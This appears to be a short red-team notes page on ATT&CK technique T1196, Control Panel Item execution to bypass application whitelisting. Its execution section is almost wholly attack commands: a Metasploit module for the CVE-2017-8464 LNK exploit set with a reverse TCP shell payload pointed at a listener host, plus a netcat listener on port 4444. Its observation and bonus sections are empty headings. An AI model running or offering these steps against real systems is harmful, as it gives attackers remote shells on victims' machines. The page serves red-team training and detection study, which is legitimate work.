T1196: Control Panel Item
Control Panel Item code execution - bypass application whitelisting.
Execution
msfconsole
use windows/local/cve_2017_8464_lnk_lpe
set payload windows/x64/shell_reverse_tcp
set lhost 10.0.0.5
exploit
root@~# nc -lvp 4444
listening on [any] 4444 ...

Observations


Bonus - Create Shortcut With PowerShell
References
PreviousT1170: MSHTANextExecuting Code as a Control Panel Item through an Exported Cplapplet Function
Last updated